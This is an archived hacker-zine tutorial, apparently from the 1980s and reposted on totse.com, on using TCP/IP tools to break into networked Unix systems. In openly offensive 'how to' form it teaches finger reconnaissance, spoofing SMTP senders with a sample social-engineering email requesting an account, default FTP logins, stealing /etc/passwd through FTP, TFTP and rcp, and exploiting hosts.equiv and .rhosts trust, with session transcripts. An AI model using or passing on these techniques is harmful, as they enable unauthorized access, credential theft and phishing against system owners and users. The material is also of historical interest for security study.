About
Community
Bad Ideas
Drugs
Ego
Erotica
Fringe
Society
Technology
Hack
Introduction to Hacking
Hack Attack
Hacker Zines
Hacking LANs, WANs, Networks, & Outdials
Magnetic Stripes and Other Data Formats
Software Cracking
Understanding the Internet
Legalities of Hacking
Word Lists
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it

The Networked Unix: TCP/IP

by Solid State

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

PREFACE

I've written this article with the assumption that those reading it have a working knowledge of UNIX and large networks, specifically the DARPA Internet -- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP (Internet Transmission Control Protocol) architecture, such as FTP, TFTP, TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I want to make it known that this file is not intended to be a 'why' file, but instead a 'how to' tutorial. In the event I get a good response concerning this document, I may later release a more technical oriented paper from a programmer's viewpoint.

NOTE: Instances where I give examples of a command format, words in capital represent variables. For example, in the line '$ telnet HOST', HOST should be replaced (in LOWERCASE!) by the name of a system. This is just my means of distinguishing between actual commands and their options. Control characters are denoted in the form of an exponent, eg. ^H is control H.

YP DATABASE

Present on every UNIX that supports TCP-IP are a set of files labeled by programmers as the yellow pages, that serve as a directory of the hosts and networks accessible by your system. These files are /etc/hosts and /etc/networks respectively. There may also be a third, /etc/hosts.equiv which is a listing of those hosts that share resources and/or have users common to each other. They are ASCII text and have viewable permissions to all. Therefore it may prove helpful to print these out for reference and easy access. Entries in the above mentioned take the form:

###.###.###.###     host.owner.research   nicknames

Example:

18.72.0.39          athena.mit.edu   mit-athena athena

The string of numbers, expressed in octal "dot notation", is the NetNumber of the host. Followed by the complete name, and lastly other names which it is universally known as. When attempting to access a system, any one of these identification codes may be used. NOTE: Most of the databases one will come across are incomplete or may be outdated. A complete host list can be obtained from the Network Information Control Center (NIC) at SRI International, the host name is sri-nic.arpa

TELNET

Telnet is the standard facility used for logging into other systems. It is found not only on UNIX, but TOPS, VMS, and all the other various operating systems found on the DDN. To activate the program:

% telnet HOST [PORT]

If invoked without arguments, it enters command mode, indicated by the prompt 'telnet>' From here, many functions are available.

open HOST [PORT]

Open connection to named computer. If PORT, which shall be explained subsequently, is ommitted then telnet will contact the TELNET server of that host. As earlier mentioned, systems can be addressed by either their NetNumber, NetName, or a nickname.

close

Close connection and return to command mode.

quit

End session and exit program.

status

Show current status of telnet. ie. connections and toggled options.

z

Suspend telnet. This allows you to operate an interactive shell on the local machine while pending an open connection to a remote host.

? COMMAND

Get help on COMMAND. Or if COMMAND is ommitted, then a summary of all options is printed.

Once a connection has been established, telnet enters input mode where you can communicate directly with the remote. To return to command mode, enter ^] A hacking session might look like:

% telnet ucbvax.berkeley.edu
Trying 10.2.0.78 ...
Connected to ucbvax.berkeley.edu.
Escape character is '^]'.



4.3 BSD UNIX (ucbvax.Berkeley.EDU)



login: example
Password: ^D
Connection closed by foreign host.
%

PORTS

Each host on the Internet runs various daemons to perform tedious upkeep jobs like recording logs, mounting disks and on UNIX, cleaning uucp and /tmp files. Along with the 'normal' daemons is one ran to accomodate communication between a host and its peers on a network. inetd the managing daemon of system to system communication has a number of various services which it regularly uses, but they can also be manually addressed via telnet. The notation, predisplayed, is simply:

% telnet HOST PORT

OR

telnet> open HOST PORT

Now each service has a port number associated with it. The number is decimal, in the range 0-1023. A database of all active services is located in the ASCII text file /etc/services

From a hacker's view the following are very helpful in the process of penetrating a system:

79 Finger server. Connecting to this will give a systat report similar to one a user would get if he was on the target system and issued the finger command. Once connected to port 79, the host will sit idle until one of two things: Either a return is pressed and a general finger will result, or a username is entered where personal info will outcome.

% telnet psuvax1.psu.edu 79
Trying 128.118.6.2 ...
Connected to psuvax1.psu.edu.
Escape character is '^]'.



Login       Name              TTY Idle    When            Office
opr      The Operator          co      Sat 19:02  334  Whitmo  x5-9723
hager    William W. Hager      d1      Sat 18:50              237-8876
georg    Georg Schnitger       22 1:32 Sat 18:42  315  Whitmo  x5-1406
malik    Sohail Malik          p0  18  Sat 19:16  214c  Compu  x5-0816
Connection closed by foreign host.
%

11 Systat server. This can not be issued to target UNIX systems, but is applicable to VMS and TOPS where it returns data like that from finger.

25 SMTP server. This is the server used for mail among systems. It is also the most vulnerable port to attack as it can be easily fooled. With this knowledge the hacker can assume any identity he wishes through mail. For example, to send mail to [email protected] from [email protected], under normal circumstances one would have to possess the root account wherefrom he would just enter:

% mail [email protected]

But this is not always feasible or possible! So we must resort to an indirect, devious approach..

% telnet cc3.bbn.com 25
Trying 8.3.0.5 ...
Connected to cc3.bbn.com.
Escape character is '^]'.



220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST



rcpt to: guest
250 guest... Recipient ok
mail from: [email protected]
250 example... Sender ok
data
354 Enter mail, end with "." on a line by itself



This is an example of the SMTP port.
.
250 Mail accepted
^]
telnet> c
Connection closed.
%

To summarize the text above; First, contact the remote at port 25 using telnet:

% telnet HOST 25

After system link authentication, enter:

rcpt to: USERNAME

Ok? Type in bogus identity:

mail from: USERNAME@HOST

To start message:

data

Now, the mail:

My organization has of late been discussing an upgrade to a Vax processor. The Sun computer we are currently using is immensely slow (and getting slower!) due to the demands put on it by the users. If you would allow me a demo account on your system so I may view its performance, I would be deeply grateful.

Please respond to me through mail at: bogus!haha!sys1!jeff.

A period on a line by itself will complete the transfer:

.

FTP

FTP is a file transfer program that is quite powerful and helpful to the hacker in obtaining access to a target. It can be used to send and receive data. Similar to telnet, the client with which to communicate can be specified when invoked:

% ftp -n HOST

The -n option I always include as it disables auto-login and net-trace, an auto-feature which sends the originator's login and system name. The prompt for FTP is 'ftp>'.

open HOST

Establish connection to the named HOST.

close

Terminate connection and return to command interpreter.

quit

Abort program.

status

Show status parameters.

! COMMAND

Run shell command on local machine. Like the 'z' option of telnet, if COMMAND is ommitted, than an interactive shell is invoked. ^D will return user back to the interpreter.

ls

Print a listing of the directory contents on the remote host in an abbreviated form. To do a long listing, enter 'dir'.

cd REMOTE_DIRECTORY

Change the working directory on server.

pwd

Print working directory on remote.

lcd DIRECTORY

Change the working directory on the local machine to DIRECTORY.

get REMOTE_FILE LOCAL_FILE

Receive the REMOTE_FILE on the remote system and name it LOCAL_FILE on the local system.

send LOCAL_FILE REMOTE_FILE

Send LOCAL_FILE to the host and name it REMOTE_FILE.

append LOCAL_FILE REMOTE_FILE

Append LOCAL_FILE to the end of the distant file, REMOTE_FILE.

rename REMOTE_FILE NEW_REMOTE_FILE

Give a new name to a remote file.

delete REMOTE_FILE

Kill REMOTE_FILE.

Various other commands exist for bulk transfers and directory management. If there is any doubt ever on a command, help is always available:

ftp> help COMMAND

Once a connection has been made, the computer will identify itself and then go idle. (That is, if auto-logging is disabled as it should be.) To login to the system:

ftp> user USERNAME

Then if a pass is required, the proper prompt will appear.

% ftp -n
ftp> o ll-xn.arpa
Connected to LL-XN.ARPA.
220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready.
ftp> user anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp>

Logging on to a FTP server is different than normally entering a machine. When a remote user is operating FTP, the exchange is treated as a process of ftp or daemon, not an actual login. Therefore, a different login program, which restricts use immensely, is used. If set up properly, FTP will chroot to /usr/spool/ftp where three directories exist, bin, etc, and pub. Within /usr/spool/ftp/etc is the password file used for the FTP server login program. It is not a complete version of that in /etc/passwd, but it can be useful by providing usenames. Also of mentioning is /etc/ftpusers. This file contains multiple lines of usernames is like /usr/lib/cron/cron.deny on a Unix System V. If you are unlucky and your username appears in the file, FTP logins are denied. A few defaults are present within this doctored version of /etc/passwd that most always will provide access to a system.

ACCOUNT                  PASSWORD
=================================
anonymous                anonymous, guest, ftp
ftp                      ftp
guest                    guest
ftpser                   ftpser
tftpser                  tftpser
help                     help

Each user may have in their home directory a file titled '.netrc'. This is a file containing usernames and passwords used on systems that a user commonly converses with. Entries in the file take the form:

machine HOST login USERNAME password PASSWORD

It is advantageous to locate all of these files on your system as they will expand not only your systems list, but also your chance of entering a computer.

Once admittance has been gained, I suggest copying the /etc/passwd file for later attempts at hacking the front end of the system if other routes such as defaults, finger, TFTP (To be explained hereafter.), or by way of the remote facilities (Ditto.) are not possible.

ftp> get /etc/passwd pass
200 PORT command okay.
150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes).
226 Transfer complete.
48 bytes received in 0.32 seconds (0.15 Kbytes/s)
ftp> close
221 Goodbye.
ftp> quit
%

TFTP

The Trivial File Transfer Program is probably the most dangerous aspect of the TCP-IP structure on the Internet. TFTP requires no account or password be present on a host system. About the only restriction is that the files inquired must have public read access permissions set. If not, an authorization failure error will result. Also, the TFTP server port must be open, otherwise no transmissions can take place.

% tftp HOST

Once connected, the user will get the 'tftp>' prompt where from he can grab or send files.

connect HOST

Set HOST up for transfers. There is no actual connection made in the sense that communication has happened, the program merely remembers what host to be used in a transfer inquiry. Therefore, there is not a disconnect command.

quit

Exit TFTP.

status

Show current set parameters. ie. HOST and timeout period.

get /PATH/FILE /PATH/FILE

Get /PATH/FILE from HOST and name it /PATH/FILE on local system. If no HOST has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'.

put /PATH/FILE /PATH/FILE

Send /PATH/FILE on local system to HOST and give it the title /PATH/FILE. As above, if HOST has not been specified, the form is 'put /PATH/FILE HOST:/PATH/FILE'.

timeout SECONDS

Set timeout parameter. The default is 25, that means abort transmission if no response from selected host after set period.

? COMMAND

Help with TFTP.

TFTP is the preferred method of file transfer. But is often closed to use due to its insecurities. To the hacker though, it is wonderful because data captured are genuine, not doctored versions as is the case with FTP. Therefore if possible, one will most likely use it to copy /etc/passwd:

% tftp mit-amt
tftp> get /etc/passwd /tmp/passwd
Received 16453 bytes in 7 seconds.
tftp> q
%

REMOTE PROCEDURES

Additional to the standard features of the TCP setup present on all machines of the net, UNIX has a set of it's own remote system interaction commands. The set of utilities, which I affectionately call the Remote Execution Facilities, are usable only between resource sharing UNIX systems. The conglomeration of remote programs can be very helpful for overtaking other suspect targets, especially if they are part of a small network unto themselves besides being major hosts on the Internet.

Before one sets out on the quest of conquering a system, it is wise to know who is currently logged on:

% rusers -l HOST

Rusers -l alone will print out a listing for all immediate surrounding UNIX hosts, but if a HOST is specified, only that particular computer will report.

% rlogin HOST -l USERNAME

If -l USERNAME is not included, the account name in use at present time will be used as the USERNAME when attempting login to HOST. If the username specified is present locally and on the distant machine in the file /etc/hosts.equiv, no password is required to login. This can be compromising to the security, a reason why the security wise will often make /etc/hosts.equiv a null file.

Each user may optionally have a file, '.rhost', in his home directory. This is a personal equivalent to /etc/hosts.equiv. If you are logged into an account with such a file, no pass is required to login (via rlogin), to the computers named.

Alike to the UUCP protocol, there is an allowance of the Remote Execution Facilities to preform commands on a networked system:

% rsh HOST -l USERNAME "COMMAND"

Remote shell will permit unlimited commands to be carried out on the remote as long as the following criteria is met:

The username, if specified (If it is not, the current local one is used.), must be present on the foreign system and have remote execution privileges.

Commands are effective according to the environment set in .cshrc and .login on the host.

An example job:

% rsh century "ps -t console"

If the quotes are ommitted then variables like *?.,X are taken literally. Also, if no redirection is submitted, than output, if the command yields it, is sent back to the issuee.

Remote Copy, a sub-command of rsh, is a command similar to uucp. It must follow the criteria of Remote Shell plus all files qued must have public read permissions.

% rcp HOST:/PATH/FILE HOST:/PATH/FILE

For example, a common call would be the password file. So if I wanted to transfer the /etc/passwd file from harvard.arpa to rutgers:

% rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd

This format leaves quite alot of flexibility as it stands third party transfers are possible. If the second HOST is not inserted, than the file is put on the local system.

A notable option of rcp is directory copy. It will if specified, copy a directory and all the trees beneath it...allowing you to in theory to copy the entire file system onto your local host. (uh, oh!)

% rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME

CONCLUSION

In closing I would like to state that I have purposely left much information uncovered if I felt it would compromise an institution or company. I apoligize for not explaining many of the subjects discussed in the full detail they deserve, but if I had this article would have been mammoth. Any questions, challenges, comments, or criticism can be directed to me, Solid State, through any of a various boards I visit or to an LOD/H Technical Journal account of which your mail shall be somehow communicated to me.

 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
If you have any questions about this, please check out our Copyright Policy.
 

totse.com certificate signatures
 
 
About | Advertise | Bad Ideas | Community | Contact Us | Copyright Policy | Drugs | Ego | Erotica
FAQ | Fringe | Link to totse.com | Search | Society | Submissions | Technology
Hot Topics
Anti-Virus
a way to monitor someones AIM conversation
VERY simple question: browser history
anyone familiar with ms secure?
how do i hide files in to jpeg
FTP Attackers...
cable tv question
FireWall
 
Sponsored Links
 
Ads presented by the
AdBrite Ad Network

 

TSHIRT HELL T-SHIRTS